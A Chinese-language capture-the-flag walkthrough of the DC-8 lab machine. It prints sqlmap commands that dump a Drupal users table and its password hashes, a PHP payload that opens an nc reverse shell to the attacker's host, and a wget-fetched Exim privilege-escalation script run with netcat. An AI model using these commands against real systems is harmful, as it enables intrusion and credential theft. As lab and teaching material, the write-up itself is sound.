DC-8 靶机

DC_8

信息搜集

存活检测

image-20231024162958870

详细扫描

image-20231024163030943

后台网页扫描

image-20231024200737628

网站信息搜集

访问不同的页面的时候 url 随之变化

尝试 sql 注入

在 url 后输入 ' 验证

直接报数据库语法错误

image-20231024165445900

漏洞利用

  • 使用 sqlmap 工具

  • 爆破数据库

    sqlmap -u 10.4.7.153/?nid=2 --dbs --batch
    

    image-20231024165605384

  • 成功爆破出两个数据库

    d7db 和 information_schema

    image-20231024165650600

  • 爆破数据库 d7db

    sqlmap -u 10.4.7.153/?nid=2 -D d7db -tables --batch
    

    image-20231024165904565

    爆破出 users 表

    image-20231024165959126

  • 爆破表中字段

    sqlmap -u 10.4.7.153/?nid=2 -D d7db -T users --dump
    

    image-20231024170111382

    爆破 admin 和 john 用户的密码

    $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
    
  • 写入 passwd 文件,使用 john 爆破

    image-20231024170925181

    爆破出一个密码 turtle

shell 获取

网页登录

  • 尝试 ssh、web 各种登录

  • 最终发现可以使用 john turtle 登录 扫描出来的 /user/login 界面

    image-20231024200703847

    image-20231024175313594

  • 网页信息搜集,最终在以下位置寻找到突破点

    image-20231024201154997

    image-20231024201214217

漏洞发现

  • 此处可以输出 php 代码

    image-20231024201244874

  • 尝试 phpinfo() 验证

    image-20231024203158733

    image-20231024203211846

    回到 view 页面,随便填写信息,点击提交

    image-20231024203250484

  • 未返回信息

    image-20231024203327278

  • 在 php 语句前随便加上一行

    image-20231024203508532

  • 成功执行

    image-20231024203548629

反弹 shell

  • kali 开启 nc 监听

    image-20231024201517645

  • 输入 php 连接命令

    <?php system("nc -e /bin/bash 10.4.7.146 7777");?>
    

    image-20231024203929166

  • 保存并提交

    成功反弹

    image-20231024204002699

提权

  • 查看 suid 权限

    image-20231024204745881

    exim4 是 Linux 系统中的一个可执行文件,它是 Exim 邮件传输代理(MTA)的主要可执行文件。Exim 是一种广泛使用的邮件服务器软件,用于在 Linux 和类 Unix 系统上传输电子邮件。

  • 查看版本

    image-20231024205148099

  • 搜索漏洞

    searchsploit exim
    

    选择适合版本的本地提权脚本

    image-20231024205259546

  • 下载提权脚本

    image-20231024205357060

  • 将脚本转换为 uninx 格式

    apt install dos2unix
    dos2unix 46996.sh
    

    image-20231024211717731

    image-20231024211749430

  • 查看脚本使用方法

    image-20231024205515165

    无需修改

  • kali 开启 http 服务将提脚本上传至靶机

    python3 -m http.server 80
    

    image-20231024205611682

  • 靶机下载提权脚本

    wget http://10.4.7.146/46996.sh
    

    image-20231024205821790

  • 使用方法

    image-20231024210614750

  • 赋权,运行

    chmod 777 46996.sh
    ./46996.sh -m netcat
    

    image-20231024212038360

  • 提权成功

    image-20231024212052055

总结

  • sql 注入
  • 反弹 shell
  • 利用漏洞脚本时注意脚本对应的系统
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值